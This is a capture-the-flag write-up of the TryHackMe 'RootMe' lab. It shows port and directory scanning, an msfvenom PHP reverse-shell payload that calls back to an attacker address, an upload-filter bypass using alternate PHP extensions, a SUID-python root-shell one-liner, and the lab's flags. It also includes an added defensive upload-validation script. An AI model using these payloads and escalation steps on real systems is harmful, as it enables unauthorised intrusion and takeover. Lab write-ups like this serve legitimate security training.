MrA7

TryHackMe CTF: RootMe

Apr 23rd, 2023

IP: **10.10.187.43**


## Reconnaissance
#### nmap
```
[kali:~]$ sudo nmap -p- 10.10.187.43
[sudo] password for kali:
Starting Nmap 7.92 ( https://nmap.org ) at 2023-03-07 10:09 EST
Nmap scan report for 10.10.187.43
Host is up (0.049s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http

Nmap done: 1 IP address (1 host up) scanned in 87.43 seconds
[kali:~]$ sudo nmap -sC -sV -p22,80 10.10.187.43
Starting Nmap 7.92 ( https://nmap.org ) at 2023-03-07 10:11 EST
Nmap scan report for 10.10.187.43
Host is up (0.043s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 4a:b9:16:08:84:c2:54:48:ba:5c:fd:3f:22:5f:22:14 (RSA)
| 256 a9:a6:86:e8:ec:96:c3:f0:03:cd:16:d5:49:73:d0:82 (ECDSA)
|_ 256 22:f6:b5:a6:54:d9:78:7c:26:03:5a:95:f3:f9:df:cd (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-title: HackIT - Home
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.06 seconds
[kali:~]$
```
- Found a web server
#### Gobuster
```
[kali:~]$ gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.187.43/
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.187.43/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2023/03/07 10:16:01 Starting gobuster in directory enumeration mode
===============================================================
/uploads (Status: 301) [Size: 314] [--> http://10.10.187.43/uploads/]
/css (Status: 301) [Size: 310] [--> http://10.10.187.43/css/]
/js (Status: 301) [Size: 309] [--> http://10.10.187.43/js/]
/panel (Status: 301) [Size: 312] [--> http://10.10.187.43/panel/]
Progress: 7383 / 220561 (3.35%) ^C
[!] Keyboard interrupt detected, terminating.

===============================================================
2023/03/07 10:16:35 Finished
===============================================================
```
- Found `/panel`, which contains an upload form, with the `/uploads` folder exposed

## Exploiting
#### Msfvenom
```
[kali:~]$ msfvenom -p php/meterpreter_reverse_tcp LHOST=10.14.36.168 LPORT=4444 -f raw > shell.php
To use retry middleware with Faraday v2.0+, install `faraday-retry` gem
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
No encoder specified, outputting raw payload
Payload size: 34789 bytes
```
- Created a PHP shell since the web server is running PHP
- Renamed the extension to `.php5` to get past the upload filter
- Sometimes the application accepts the file but does not execute it
- Uploaded it and got a reverse shell as the `www-data` user
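The `/uploads` listing further down shows exactly which variants the target's extension blacklist let through (`.php3`, `.php5`, `.PHTML`, `.php%00.txt`). The following allowlist check is an added example, not code from the writeup or from the RootMe box; the allowed extension set is an assumed policy, and the sample filenames are constructed from the listing plus a few benign names.

```python
import os
import re

# Assumed policy: an allowlist of content types the upload form should accept.
ALLOWED_EXTENSIONS = {"png", "jpg", "jpeg", "gif", "pdf"}

# Belt-and-braces guard in case someone later widens the allowlist: extensions
# that Apache/PHP installs commonly route to an interpreter or run directly.
EXECUTABLE_EXTENSIONS = {"php", "php3", "php4", "php5", "php7",
                         "phtml", "phar", "phps", "cgi", "sh", "elf"}

_SAFE_BASE = re.compile(r"^[A-Za-z0-9_-]{1,64}$")


def is_upload_allowed(filename: str) -> bool:
    """Return True only if the name passes every rule below."""
    # 1. Reject NUL truncation tricks, both the raw byte and the literal "%00".
    if "\x00" in filename or "%00" in filename.lower():
        return False
    # 2. No directory components (e.g. "../x.png").
    if os.path.basename(filename) != filename:
        return False
    # 3. Exactly one extension: "a.jpg.php" and "shellfinal" both fail here.
    parts = filename.split(".")
    if len(parts) != 2:
        return False
    base, ext = parts
    ext = ext.lower()                      # ".PHTML" and ".PNG" compare lowercase
    # 4. Conservative character set for the base name.
    if not _SAFE_BASE.match(base):
        return False
    # 5. Allowlist decides; the executable set can never be accepted.
    return ext in ALLOWED_EXTENSIONS and ext not in EXECUTABLE_EXTENSIONS


# Constructed sample: names from the /uploads listing plus benign uploads.
SAMPLE_NAMES = [
    "shell.php3", "shellfinal.PHTML", "shellfinal.php%00.txt", "shellfinal.php5",
    "shelly.elf", "shellyy.sh", "webshell.php3", "shellfinal",
    "avatar.PNG", "report.pdf", "photo.jpg",
]


def classify(names=SAMPLE_NAMES) -> dict:
    """Map each filename to the verdict, handy for reviewing a policy change."""
    return {n: is_upload_allowed(n) for n in names}


if __name__ == "__main__":
    for name, ok in classify().items():
        print(f"{'ACCEPT' if ok else 'REJECT':7} {name}")
```

Note that the filename check alone does not stop Apache from interpreting a file already sitting in `/uploads`; pairing it with a directory-level handler/exec restriction on the upload path closes the other half of the gap.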


## Priv Esc
- Looked for SUID files: `find / -user root -perm /4000`
- Got a bunch, but the interesting one is `/usr/bin/python`
- Went to https://gtfobins.github.io/ and looked under python > SUID
- Found this: `./python -c 'import os; os.execl("/bin/sh", "sh", "-p")'`
- Executed it:
```
python -c 'import os; os.execl("/bin/sh", "sh", "-p")'
ls
shell.php3
shell1.php3
shellfinal
shellfinal.PHTML
shellfinal.php%00.txt
shellfinal.php5
shelly.elf
shellyy.php3
shellyy.sh
webshell.php3
whoami
root
cd /root
ls
root.txt
cat root.txt
THM{pr1v1l3g3_3sc4l4t10n}
```

## Flags
- User: `THM{y0u_g0t_a_sh3ll}`
- Root: `THM{pr1v1l3g3_3sc4l4t10n}`

This paste owned by https://linktr.ee/a7.acc